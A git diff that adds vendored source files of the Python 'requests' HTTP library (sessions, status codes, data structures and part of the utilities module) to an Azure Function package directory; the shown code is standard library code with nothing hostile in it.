a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/packages.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/packages.py new file mode 100644 index 0000000..9ee2b49 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/packages.py @@ -0,0 +1,28 @@ +import sys + +try: + import chardet +except ImportError: + import warnings + + import charset_normalizer as chardet + + warnings.filterwarnings("ignore", "Trying to detect", module="charset_normalizer") + +# This code exists for backwards compatibility reasons. +# I don't like it either. Just look the other way. :) + +for package in ("urllib3", "idna"): + locals()[package] = __import__(package) + # This traversal is apparently necessary such that the identities are + # preserved (requests.packages.urllib3.* is urllib3.*) + for mod in list(sys.modules): + if mod == package or mod.startswith(f"{package}."): + sys.modules[f"requests.packages.{mod}"] = sys.modules[mod] + +target = chardet.__name__ +for mod in list(sys.modules): + if mod == target or mod.startswith(f"{target}."): + target = target.replace(target, "chardet") + sys.modules[f"requests.packages.{target}"] = sys.modules[mod] +# Kinda cool, though, right? diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/sessions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/sessions.py new file mode 100644 index 0000000..5c685c0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/sessions.py @@ -0,0 +1,831 @@ +""" +requests.sessions +~~~~~~~~~~~~~~~~~ + +This module provides a Session object to manage and persist settings across +requests (cookies, auth, proxies). +""" +import os +import sys +import time +from collections import OrderedDict +from datetime import timedelta + +from ._internal_utils import to_native_string +from .adapters import HTTPAdapter +from .auth import _basic_auth_str +from .compat import Mapping, cookielib, urljoin, urlparse +from .cookies import ( + RequestsCookieJar, + cookiejar_from_dict, + extract_cookies_to_jar, + merge_cookies, +) +from .exceptions import ( + ChunkedEncodingError, + ContentDecodingError, + InvalidSchema, + TooManyRedirects, +) +from .hooks import default_hooks, dispatch_hook + +# formerly defined here, reexposed here for backward compatibility +from .models import ( # noqa: F401 + DEFAULT_REDIRECT_LIMIT, + REDIRECT_STATI, + PreparedRequest, + Request, +) +from .status_codes import codes +from .structures import CaseInsensitiveDict +from .utils import ( # noqa: F401 + DEFAULT_PORTS, + default_headers, + get_auth_from_url, + get_environ_proxies, + get_netrc_auth, + requote_uri, + resolve_proxies, + rewind_body, + should_bypass_proxies, + to_key_val_list, +) + +# Preferred clock, based on which one is more accurate on a given system. +if sys.platform == "win32": + preferred_clock = time.perf_counter +else: + preferred_clock = time.time + + +def merge_setting(request_setting, session_setting, dict_class=OrderedDict): + """Determines appropriate setting for a given request, taking into account + the explicit setting on that request, and the setting in the session. If a + setting is a dictionary, they will be merged together using `dict_class` + """ + + if session_setting is None: + return request_setting + + if request_setting is None: + return session_setting + + # Bypass if not a dictionary (e.g. verify) + if not ( + isinstance(session_setting, Mapping) and isinstance(request_setting, Mapping) + ): + return request_setting + + merged_setting = dict_class(to_key_val_list(session_setting)) + merged_setting.update(to_key_val_list(request_setting)) + + # Remove keys that are set to None. Extract keys first to avoid altering + # the dictionary during iteration. + none_keys = [k for (k, v) in merged_setting.items() if v is None] + for key in none_keys: + del merged_setting[key] + + return merged_setting + + +def merge_hooks(request_hooks, session_hooks, dict_class=OrderedDict): + """Properly merges both requests and session hooks. + + This is necessary because when request_hooks == {'response': []}, the + merge breaks Session hooks entirely. + """ + if session_hooks is None or session_hooks.get("response") == []: + return request_hooks + + if request_hooks is None or request_hooks.get("response") == []: + return session_hooks + + return merge_setting(request_hooks, session_hooks, dict_class) + + +class SessionRedirectMixin: + def get_redirect_target(self, resp): + """Receives a Response. Returns a redirect URI or ``None``""" + # Due to the nature of how requests processes redirects this method will + # be called at least once upon the original response and at least twice + # on each subsequent redirect response (if any). + # If a custom mixin is used to handle this logic, it may be advantageous + # to cache the redirect location onto the response object as a private + # attribute. + if resp.is_redirect: + location = resp.headers["location"] + # Currently the underlying http module on py3 decode headers + # in latin1, but empirical evidence suggests that latin1 is very + # rarely used with non-ASCII characters in HTTP headers. + # It is more likely to get UTF8 header rather than latin1. + # This causes incorrect handling of UTF8 encoded location headers. + # To solve this, we re-encode the location in latin1. + location = location.encode("latin1") + return to_native_string(location, "utf8") + return None + + def should_strip_auth(self, old_url, new_url): + """Decide whether Authorization header should be removed when redirecting""" + old_parsed = urlparse(old_url) + new_parsed = urlparse(new_url) + if old_parsed.hostname != new_parsed.hostname: + return True + # Special case: allow http -> https redirect when using the standard + # ports. This isn't specified by RFC 7235, but is kept to avoid + # breaking backwards compatibility with older versions of requests + # that allowed any redirects on the same host. + if ( + old_parsed.scheme == "http" + and old_parsed.port in (80, None) + and new_parsed.scheme == "https" + and new_parsed.port in (443, None) + ): + return False + + # Handle default port usage corresponding to scheme. + changed_port = old_parsed.port != new_parsed.port + changed_scheme = old_parsed.scheme != new_parsed.scheme + default_port = (DEFAULT_PORTS.get(old_parsed.scheme, None), None) + if ( + not changed_scheme + and old_parsed.port in default_port + and new_parsed.port in default_port + ): + return False + + # Standard case: root URI must match + return changed_port or changed_scheme + + def resolve_redirects( + self, + resp, + req, + stream=False, + timeout=None, + verify=True, + cert=None, + proxies=None, + yield_requests=False, + **adapter_kwargs, + ): + """Receives a Response. Returns a generator of Responses or Requests.""" + + hist = [] # keep track of history + + url = self.get_redirect_target(resp) + previous_fragment = urlparse(req.url).fragment + while url: + prepared_request = req.copy() + + # Update history and keep track of redirects. + # resp.history must ignore the original request in this loop + hist.append(resp) + resp.history = hist[1:] + + try: + resp.content # Consume socket so it can be released + except (ChunkedEncodingError, ContentDecodingError, RuntimeError): + resp.raw.read(decode_content=False) + + if len(resp.history) >= self.max_redirects: + raise TooManyRedirects( + f"Exceeded {self.max_redirects} redirects.", response=resp + ) + + # Release the connection back into the pool. + resp.close() + + # Handle redirection without scheme (see: RFC 1808 Section 4) + if url.startswith("//"): + parsed_rurl = urlparse(resp.url) + url = ":".join([to_native_string(parsed_rurl.scheme), url]) + + # Normalize url case and attach previous fragment if needed (RFC 7231 7.1.2) + parsed = urlparse(url) + if parsed.fragment == "" and previous_fragment: + parsed = parsed._replace(fragment=previous_fragment) + elif parsed.fragment: + previous_fragment = parsed.fragment + url = parsed.geturl() + + # Facilitate relative 'location' headers, as allowed by RFC 7231. + # (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource') + # Compliant with RFC3986, we percent encode the url. + if not parsed.netloc: + url = urljoin(resp.url, requote_uri(url)) + else: + url = requote_uri(url) + + prepared_request.url = to_native_string(url) + + self.rebuild_method(prepared_request, resp) + + # https://github.com/psf/requests/issues/1084 + if resp.status_code not in ( + codes.temporary_redirect, + codes.permanent_redirect, + ): + # https://github.com/psf/requests/issues/3490 + purged_headers = ("Content-Length", "Content-Type", "Transfer-Encoding") + for header in purged_headers: + prepared_request.headers.pop(header, None) + prepared_request.body = None + + headers = prepared_request.headers + headers.pop("Cookie", None) + + # Extract any cookies sent on the response to the cookiejar + # in the new request. Because we've mutated our copied prepared + # request, use the old one that we haven't yet touched. + extract_cookies_to_jar(prepared_request._cookies, req, resp.raw) + merge_cookies(prepared_request._cookies, self.cookies) + prepared_request.prepare_cookies(prepared_request._cookies) + + # Rebuild auth and proxy information. + proxies = self.rebuild_proxies(prepared_request, proxies) + self.rebuild_auth(prepared_request, resp) + + # A failed tell() sets `_body_position` to `object()`. This non-None + # value ensures `rewindable` will be True, allowing us to raise an + # UnrewindableBodyError, instead of hanging the connection. + rewindable = prepared_request._body_position is not None and ( + "Content-Length" in headers or "Transfer-Encoding" in headers + ) + + # Attempt to rewind consumed file-like object. + if rewindable: + rewind_body(prepared_request) + + # Override the original request. + req = prepared_request + + if yield_requests: + yield req + else: + + resp = self.send( + req, + stream=stream, + timeout=timeout, + verify=verify, + cert=cert, + proxies=proxies, + allow_redirects=False, + **adapter_kwargs, + ) + + extract_cookies_to_jar(self.cookies, prepared_request, resp.raw) + + # extract redirect url, if any, for the next loop + url = self.get_redirect_target(resp) + yield resp + + def rebuild_auth(self, prepared_request, response): + """When being redirected we may want to strip authentication from the + request to avoid leaking credentials. This method intelligently removes + and reapplies authentication where possible to avoid credential loss. + """ + headers = prepared_request.headers + url = prepared_request.url + + if "Authorization" in headers and self.should_strip_auth( + response.request.url, url + ): + # If we get redirected to a new host, we should strip out any + # authentication headers. + del headers["Authorization"] + + # .netrc might have more auth for us on our new host. + new_auth = get_netrc_auth(url) if self.trust_env else None + if new_auth is not None: + prepared_request.prepare_auth(new_auth) + + def rebuild_proxies(self, prepared_request, proxies): + """This method re-evaluates the proxy configuration by considering the + environment variables. If we are redirected to a URL covered by + NO_PROXY, we strip the proxy configuration. Otherwise, we set missing + proxy keys for this URL (in case they were stripped by a previous + redirect). + + This method also replaces the Proxy-Authorization header where + necessary. + + :rtype: dict + """ + headers = prepared_request.headers + scheme = urlparse(prepared_request.url).scheme + new_proxies = resolve_proxies(prepared_request, proxies, self.trust_env) + + if "Proxy-Authorization" in headers: + del headers["Proxy-Authorization"] + + try: + username, password = get_auth_from_url(new_proxies[scheme]) + except KeyError: + username, password = None, None + + if username and password: + headers["Proxy-Authorization"] = _basic_auth_str(username, password) + + return new_proxies + + def rebuild_method(self, prepared_request, response): + """When being redirected we may want to change the method of the request + based on certain specs or browser behavior. + """ + method = prepared_request.method + + # https://tools.ietf.org/html/rfc7231#section-6.4.4 + if response.status_code == codes.see_other and method != "HEAD": + method = "GET" + + # Do what the browsers do, despite standards... + # First, turn 302s into GETs. + if response.status_code == codes.found and method != "HEAD": + method = "GET" + + # Second, if a POST is responded to with a 301, turn it into a GET. + # This bizarre behaviour is explained in Issue 1704. + if response.status_code == codes.moved and method == "POST": + method = "GET" + + prepared_request.method = method + + +class Session(SessionRedirectMixin): + """A Requests session. + + Provides cookie persistence, connection-pooling, and configuration. + + Basic Usage:: + + >>> import requests + >>> s = requests.Session() + >>> s.get('https://httpbin.org/get') + + + Or as a context manager:: + + >>> with requests.Session() as s: + ... s.get('https://httpbin.org/get') + + """ + + __attrs__ = [ + "headers", + "cookies", + "auth", + "proxies", + "hooks", + "params", + "verify", + "cert", + "adapters", + "stream", + "trust_env", + "max_redirects", + ] + + def __init__(self): + + #: A case-insensitive dictionary of headers to be sent on each + #: :class:`Request ` sent from this + #: :class:`Session `. + self.headers = default_headers() + + #: Default Authentication tuple or object to attach to + #: :class:`Request `. + self.auth = None + + #: Dictionary mapping protocol or protocol and host to the URL of the proxy + #: (e.g. {'http': 'foo.bar:3128', 'http://host.name': 'foo.bar:4012'}) to + #: be used on each :class:`Request `. + self.proxies = {} + + #: Event-handling hooks. + self.hooks = default_hooks() + + #: Dictionary of querystring data to attach to each + #: :class:`Request `. The dictionary values may be lists for + #: representing multivalued query parameters. + self.params = {} + + #: Stream response content default. + self.stream = False + + #: SSL Verification default. + #: Defaults to `True`, requiring requests to verify the TLS certificate at the + #: remote end. + #: If verify is set to `False`, requests will accept any TLS certificate + #: presented by the server, and will ignore hostname mismatches and/or + #: expired certificates, which will make your application vulnerable to + #: man-in-the-middle (MitM) attacks. + #: Only set this to `False` for testing. + self.verify = True + + #: SSL client certificate default, if String, path to ssl client + #: cert file (.pem). If Tuple, ('cert', 'key') pair. + self.cert = None + + #: Maximum number of redirects allowed. If the request exceeds this + #: limit, a :class:`TooManyRedirects` exception is raised. + #: This defaults to requests.models.DEFAULT_REDIRECT_LIMIT, which is + #: 30. + self.max_redirects = DEFAULT_REDIRECT_LIMIT + + #: Trust environment settings for proxy configuration, default + #: authentication and similar. + self.trust_env = True + + #: A CookieJar containing all currently outstanding cookies set on this + #: session. By default it is a + #: :class:`RequestsCookieJar `, but + #: may be any other ``cookielib.CookieJar`` compatible object. + self.cookies = cookiejar_from_dict({}) + + # Default connection adapters. + self.adapters = OrderedDict() + self.mount("https://", HTTPAdapter()) + self.mount("http://", HTTPAdapter()) + + def __enter__(self): + return self + + def __exit__(self, *args): + self.close() + + def prepare_request(self, request): + """Constructs a :class:`PreparedRequest ` for + transmission and returns it. The :class:`PreparedRequest` has settings + merged from the :class:`Request ` instance and those of the + :class:`Session`. + + :param request: :class:`Request` instance to prepare with this + session's settings. + :rtype: requests.PreparedRequest + """ + cookies = request.cookies or {} + + # Bootstrap CookieJar. + if not isinstance(cookies, cookielib.CookieJar): + cookies = cookiejar_from_dict(cookies) + + # Merge with session cookies + merged_cookies = merge_cookies( + merge_cookies(RequestsCookieJar(), self.cookies), cookies + ) + + # Set environment's basic authentication if not explicitly set. + auth = request.auth + if self.trust_env and not auth and not self.auth: + auth = get_netrc_auth(request.url) + + p = PreparedRequest() + p.prepare( + method=request.method.upper(), + url=request.url, + files=request.files, + data=request.data, + json=request.json, + headers=merge_setting( + request.headers, self.headers, dict_class=CaseInsensitiveDict + ), + params=merge_setting(request.params, self.params), + auth=merge_setting(auth, self.auth), + cookies=merged_cookies, + hooks=merge_hooks(request.hooks, self.hooks), + ) + return p + + def request( + self, + method, + url, + params=None, + data=None, + headers=None, + cookies=None, + files=None, + auth=None, + timeout=None, + allow_redirects=True, + proxies=None, + hooks=None, + stream=None, + verify=None, + cert=None, + json=None, + ): + """Constructs a :class:`Request `, prepares it and sends it. + Returns :class:`Response ` object. + + :param method: method for the new :class:`Request` object. + :param url: URL for the new :class:`Request` object. + :param params: (optional) Dictionary or bytes to be sent in the query + string for the :class:`Request`. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json to send in the body of the + :class:`Request`. + :param headers: (optional) Dictionary of HTTP Headers to send with the + :class:`Request`. + :param cookies: (optional) Dict or CookieJar object to send with the + :class:`Request`. + :param files: (optional) Dictionary of ``'filename': file-like-objects`` + for multipart encoding upload. + :param auth: (optional) Auth tuple or callable to enable + Basic/Digest/Custom HTTP Auth. + :param timeout: (optional) How long to wait for the server to send + data before giving up, as a float, or a :ref:`(connect timeout, + read timeout) ` tuple. + :type timeout: float or tuple + :param allow_redirects: (optional) Set to True by default. + :type allow_redirects: bool + :param proxies: (optional) Dictionary mapping protocol or protocol and + hostname to the URL of the proxy. + :param stream: (optional) whether to immediately download the response + content. Defaults to ``False``. + :param verify: (optional) Either a boolean, in which case it controls whether we verify + the server's TLS certificate, or a string, in which case it must be a path + to a CA bundle to use. Defaults to ``True``. When set to + ``False``, requests will accept any TLS certificate presented by + the server, and will ignore hostname mismatches and/or expired + certificates, which will make your application vulnerable to + man-in-the-middle (MitM) attacks. Setting verify to ``False`` + may be useful during local development or testing. + :param cert: (optional) if String, path to ssl client cert file (.pem). + If Tuple, ('cert', 'key') pair. + :rtype: requests.Response + """ + # Create the Request. + req = Request( + method=method.upper(), + url=url, + headers=headers, + files=files, + data=data or {}, + json=json, + params=params or {}, + auth=auth, + cookies=cookies, + hooks=hooks, + ) + prep = self.prepare_request(req) + + proxies = proxies or {} + + settings = self.merge_environment_settings( + prep.url, proxies, stream, verify, cert + ) + + # Send the request. + send_kwargs = { + "timeout": timeout, + "allow_redirects": allow_redirects, + } + send_kwargs.update(settings) + resp = self.send(prep, **send_kwargs) + + return resp + + def get(self, url, **kwargs): + r"""Sends a GET request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + kwargs.setdefault("allow_redirects", True) + return self.request("GET", url, **kwargs) + + def options(self, url, **kwargs): + r"""Sends a OPTIONS request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + kwargs.setdefault("allow_redirects", True) + return self.request("OPTIONS", url, **kwargs) + + def head(self, url, **kwargs): + r"""Sends a HEAD request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + kwargs.setdefault("allow_redirects", False) + return self.request("HEAD", url, **kwargs) + + def post(self, url, data=None, json=None, **kwargs): + r"""Sends a POST request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + return self.request("POST", url, data=data, json=json, **kwargs) + + def put(self, url, data=None, **kwargs): + r"""Sends a PUT request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + return self.request("PUT", url, data=data, **kwargs) + + def patch(self, url, data=None, **kwargs): + r"""Sends a PATCH request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + return self.request("PATCH", url, data=data, **kwargs) + + def delete(self, url, **kwargs): + r"""Sends a DELETE request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + return self.request("DELETE", url, **kwargs) + + def send(self, request, **kwargs): + """Send a given PreparedRequest. + + :rtype: requests.Response + """ + # Set defaults that the hooks can utilize to ensure they always have + # the correct parameters to reproduce the previous request. + kwargs.setdefault("stream", self.stream) + kwargs.setdefault("verify", self.verify) + kwargs.setdefault("cert", self.cert) + if "proxies" not in kwargs: + kwargs["proxies"] = resolve_proxies(request, self.proxies, self.trust_env) + + # It's possible that users might accidentally send a Request object. + # Guard against that specific failure case. + if isinstance(request, Request): + raise ValueError("You can only send PreparedRequests.") + + # Set up variables needed for resolve_redirects and dispatching of hooks + allow_redirects = kwargs.pop("allow_redirects", True) + stream = kwargs.get("stream") + hooks = request.hooks + + # Get the appropriate adapter to use + adapter = self.get_adapter(url=request.url) + + # Start time (approximately) of the request + start = preferred_clock() + + # Send the request + r = adapter.send(request, **kwargs) + + # Total elapsed time of the request (approximately) + elapsed = preferred_clock() - start + r.elapsed = timedelta(seconds=elapsed) + + # Response manipulation hooks + r = dispatch_hook("response", hooks, r, **kwargs) + + # Persist cookies + if r.history: + + # If the hooks create history then we want those cookies too + for resp in r.history: + extract_cookies_to_jar(self.cookies, resp.request, resp.raw) + + extract_cookies_to_jar(self.cookies, request, r.raw) + + # Resolve redirects if allowed. + if allow_redirects: + # Redirect resolving generator. + gen = self.resolve_redirects(r, request, **kwargs) + history = [resp for resp in gen] + else: + history = [] + + # Shuffle things around if there's history. + if history: + # Insert the first (original) request at the start + history.insert(0, r) + # Get the last request made + r = history.pop() + r.history = history + + # If redirects aren't being followed, store the response on the Request for Response.next(). + if not allow_redirects: + try: + r._next = next( + self.resolve_redirects(r, request, yield_requests=True, **kwargs) + ) + except StopIteration: + pass + + if not stream: + r.content + + return r + + def merge_environment_settings(self, url, proxies, stream, verify, cert): + """ + Check the environment and merge it with some settings. + + :rtype: dict + """ + # Gather clues from the surrounding environment. + if self.trust_env: + # Set environment's proxies. + no_proxy = proxies.get("no_proxy") if proxies is not None else None + env_proxies = get_environ_proxies(url, no_proxy=no_proxy) + for (k, v) in env_proxies.items(): + proxies.setdefault(k, v) + + # Look for requests environment configuration + # and be compatible with cURL. + if verify is True or verify is None: + verify = ( + os.environ.get("REQUESTS_CA_BUNDLE") + or os.environ.get("CURL_CA_BUNDLE") + or verify + ) + + # Merge all the kwargs. + proxies = merge_setting(proxies, self.proxies) + stream = merge_setting(stream, self.stream) + verify = merge_setting(verify, self.verify) + cert = merge_setting(cert, self.cert) + + return {"proxies": proxies, "stream": stream, "verify": verify, "cert": cert} + + def get_adapter(self, url): + """ + Returns the appropriate connection adapter for the given URL. + + :rtype: requests.adapters.BaseAdapter + """ + for (prefix, adapter) in self.adapters.items(): + + if url.lower().startswith(prefix.lower()): + return adapter + + # Nothing matches :-/ + raise InvalidSchema(f"No connection adapters were found for {url!r}") + + def close(self): + """Closes all adapters and as such the session""" + for v in self.adapters.values(): + v.close() + + def mount(self, prefix, adapter): + """Registers a connection adapter to a prefix. + + Adapters are sorted in descending order by prefix length. + """ + self.adapters[prefix] = adapter + keys_to_move = [k for k in self.adapters if len(k) < len(prefix)] + + for key in keys_to_move: + self.adapters[key] = self.adapters.pop(key) + + def __getstate__(self): + state = {attr: getattr(self, attr, None) for attr in self.__attrs__} + return state + + def __setstate__(self, state): + for attr, value in state.items(): + setattr(self, attr, value) + + +def session(): + """ + Returns a :class:`Session` for context-management. + + .. deprecated:: 1.0.0 + + This method has been deprecated since version 1.0.0 and is only kept for + backwards compatibility. New code should use :class:`~requests.sessions.Session` + to create a session. This may be removed at a future date. + + :rtype: Session + """ + return Session() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/status_codes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/status_codes.py new file mode 100644 index 0000000..34295f3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/status_codes.py @@ -0,0 +1,128 @@ +r""" +The ``codes`` object defines a mapping from common names for HTTP statuses +to their numerical codes, accessible either as attributes or as dictionary +items. + +Example:: + + >>> import requests + >>> requests.codes['temporary_redirect'] + 307 + >>> requests.codes.teapot + 418 + >>> requests.codes['\o/'] + 200 + +Some codes have multiple names, and both upper- and lower-case versions of +the names are allowed. For example, ``codes.ok``, ``codes.OK``, and +``codes.okay`` all correspond to the HTTP status code 200. +""" + +from .structures import LookupDict + +_codes = { + # Informational. + 100: ("continue",), + 101: ("switching_protocols",), + 102: ("processing",), + 103: ("checkpoint",), + 122: ("uri_too_long", "request_uri_too_long"), + 200: ("ok", "okay", "all_ok", "all_okay", "all_good", "\\o/", "✓"), + 201: ("created",), + 202: ("accepted",), + 203: ("non_authoritative_info", "non_authoritative_information"), + 204: ("no_content",), + 205: ("reset_content", "reset"), + 206: ("partial_content", "partial"), + 207: ("multi_status", "multiple_status", "multi_stati", "multiple_stati"), + 208: ("already_reported",), + 226: ("im_used",), + # Redirection. + 300: ("multiple_choices",), + 301: ("moved_permanently", "moved", "\\o-"), + 302: ("found",), + 303: ("see_other", "other"), + 304: ("not_modified",), + 305: ("use_proxy",), + 306: ("switch_proxy",), + 307: ("temporary_redirect", "temporary_moved", "temporary"), + 308: ( + "permanent_redirect", + "resume_incomplete", + "resume", + ), # "resume" and "resume_incomplete" to be removed in 3.0 + # Client Error. + 400: ("bad_request", "bad"), + 401: ("unauthorized",), + 402: ("payment_required", "payment"), + 403: ("forbidden",), + 404: ("not_found", "-o-"), + 405: ("method_not_allowed", "not_allowed"), + 406: ("not_acceptable",), + 407: ("proxy_authentication_required", "proxy_auth", "proxy_authentication"), + 408: ("request_timeout", "timeout"), + 409: ("conflict",), + 410: ("gone",), + 411: ("length_required",), + 412: ("precondition_failed", "precondition"), + 413: ("request_entity_too_large",), + 414: ("request_uri_too_large",), + 415: ("unsupported_media_type", "unsupported_media", "media_type"), + 416: ( + "requested_range_not_satisfiable", + "requested_range", + "range_not_satisfiable", + ), + 417: ("expectation_failed",), + 418: ("im_a_teapot", "teapot", "i_am_a_teapot"), + 421: ("misdirected_request",), + 422: ("unprocessable_entity", "unprocessable"), + 423: ("locked",), + 424: ("failed_dependency", "dependency"), + 425: ("unordered_collection", "unordered"), + 426: ("upgrade_required", "upgrade"), + 428: ("precondition_required", "precondition"), + 429: ("too_many_requests", "too_many"), + 431: ("header_fields_too_large", "fields_too_large"), + 444: ("no_response", "none"), + 449: ("retry_with", "retry"), + 450: ("blocked_by_windows_parental_controls", "parental_controls"), + 451: ("unavailable_for_legal_reasons", "legal_reasons"), + 499: ("client_closed_request",), + # Server Error. + 500: ("internal_server_error", "server_error", "/o\\", "✗"), + 501: ("not_implemented",), + 502: ("bad_gateway",), + 503: ("service_unavailable", "unavailable"), + 504: ("gateway_timeout",), + 505: ("http_version_not_supported", "http_version"), + 506: ("variant_also_negotiates",), + 507: ("insufficient_storage",), + 509: ("bandwidth_limit_exceeded", "bandwidth"), + 510: ("not_extended",), + 511: ("network_authentication_required", "network_auth", "network_authentication"), +} + +codes = LookupDict(name="status_codes") + + +def _init(): + for code, titles in _codes.items(): + for title in titles: + setattr(codes, title, code) + if not title.startswith(("\\", "/")): + setattr(codes, title.upper(), code) + + def doc(code): + names = ", ".join(f"``{n}``" for n in _codes[code]) + return "* %d: %s" % (code, names) + + global __doc__ + __doc__ = ( + __doc__ + "\n" + "\n".join(doc(code) for code in sorted(_codes)) + if __doc__ is not None + else None + ) + + +_init() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/structures.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/structures.py new file mode 100644 index 0000000..f2005b5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/structures.py @@ -0,0 +1,99 @@ +""" +requests.structures +~~~~~~~~~~~~~~~~~~~ + +Data structures that power Requests. +""" + +from collections import OrderedDict + +from .compat import Mapping, MutableMapping + + +class CaseInsensitiveDict(MutableMapping): + """A case-insensitive ``dict``-like object. + + Implements all methods and operations of + ``MutableMapping`` as well as dict's ``copy``. Also + provides ``lower_items``. + + All keys are expected to be strings. The structure remembers the + case of the last key to be set, and ``iter(instance)``, + ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()`` + will contain case-sensitive keys. However, querying and contains + testing is case insensitive:: + + cid = CaseInsensitiveDict() + cid['Accept'] = 'application/json' + cid['aCCEPT'] == 'application/json' # True + list(cid) == ['Accept'] # True + + For example, ``headers['content-encoding']`` will return the + value of a ``'Content-Encoding'`` response header, regardless + of how the header name was originally stored. + + If the constructor, ``.update``, or equality comparison + operations are given keys that have equal ``.lower()``s, the + behavior is undefined. + """ + + def __init__(self, data=None, **kwargs): + self._store = OrderedDict() + if data is None: + data = {} + self.update(data, **kwargs) + + def __setitem__(self, key, value): + # Use the lowercased key for lookups, but store the actual + # key alongside the value. + self._store[key.lower()] = (key, value) + + def __getitem__(self, key): + return self._store[key.lower()][1] + + def __delitem__(self, key): + del self._store[key.lower()] + + def __iter__(self): + return (casedkey for casedkey, mappedvalue in self._store.values()) + + def __len__(self): + return len(self._store) + + def lower_items(self): + """Like iteritems(), but with all lowercase keys.""" + return ((lowerkey, keyval[1]) for (lowerkey, keyval) in self._store.items()) + + def __eq__(self, other): + if isinstance(other, Mapping): + other = CaseInsensitiveDict(other) + else: + return NotImplemented + # Compare insensitively + return dict(self.lower_items()) == dict(other.lower_items()) + + # Copy is required + def copy(self): + return CaseInsensitiveDict(self._store.values()) + + def __repr__(self): + return str(dict(self.items())) + + +class LookupDict(dict): + """Dictionary lookup object.""" + + def __init__(self, name=None): + self.name = name + super().__init__() + + def __repr__(self): + return f"" + + def __getitem__(self, key): + # We allow fall-through here, so values default to None + + return self.__dict__.get(key, None) + + def get(self, key, default=None): + return self.__dict__.get(key, default) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/utils.py new file mode 100644 index 0000000..498200f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/utils.py @@ -0,0 +1,1086 @@ +""" +requests.utils +~~~~~~~~~~~~~~ + +This module provides utility functions that are used within Requests +that are also useful for external consumption. +""" + +import codecs +import contextlib +import io +import os +import re +import socket +import struct +import sys +import tempfile +import warnings +import zipfile +from collections import OrderedDict + +from urllib3.util import make_headers, parse_url + +from . import certs +from .__version__ import __version__ + +# to_native_string is unused here, but imported here for backwards compatibility +from ._internal_utils import HEADER_VALIDATORS, to_native_string # noqa: F401 +from .compat import ( + Mapping, + basestring, + bytes, + getproxies, + getproxies_environment, + integer_types, +) +from .compat import parse_http_list as _parse_list_header +from .compat import ( + proxy_bypass, + proxy_bypass_environment, + quote, + str, + unquote, + urlparse, + urlunparse, +) +from .cookies import cookiejar_from_dict +from .exceptions import ( + FileModeWarning, + InvalidHeader, + InvalidURL, + UnrewindableBodyError, +) +from .structures import CaseInsensitiveDict + +NETRC_FILES = (".netrc", "_netrc") + +DEFAULT_CA_BUNDLE_PATH = certs.where() + +DEFAULT_PORTS = {"http": 80, "https": 443} + +# Ensure that ', ' is used to preserve previous delimiter behavior. +DEFAULT_ACCEPT_ENCODING = ", ".join( + re.split(r",\s*", make_headers(accept_encoding=True)["accept-encoding"]) +) + + +if sys.platform == "win32": + # provide a proxy_bypass version on Windows without DNS lookups + + def proxy_bypass_registry(host): + try: + import winreg + except ImportError: + return False + + try: + internetSettings = winreg.OpenKey( + winreg.HKEY_CURRENT_USER, + r"Software\Microsoft\Windows\CurrentVersion\Internet Settings", + ) + # ProxyEnable could be REG_SZ or REG_DWORD, normalizing it + proxyEnable = int(winreg.QueryValueEx(internetSettings, "ProxyEnable")[0]) + # ProxyOverride is almost always a string + proxyOverride = winreg.QueryValueEx(internetSettings, "ProxyOverride")[0] + except (OSError, ValueError): + return False + if not proxyEnable or not proxyOverride: + return False + + # make a check value list from the registry entry: replace the + # '' string by the localhost entry and the corresponding + # canonical entry. + proxyOverride = proxyOverride.split(";") + # now check if we match one of the registry values. + for test in proxyOverride: + if test == "": + if "." not in host: + return True + test = test.replace(".", r"\.") # mask dots + test = test.replace("*", r".*") # change glob sequence + test = test.replace("?", r".") # change glob char + if re.match(test, host, re.I): + return True + return False + + def proxy_bypass(host): # noqa + """Return True, if the host should be bypassed. + + Checks proxy settings gathered from the environment, if specified, + or the registry. + """ + if getproxies_environment(): + return proxy_bypass_environment(host) + else: + return proxy_bypass_registry(host) + + 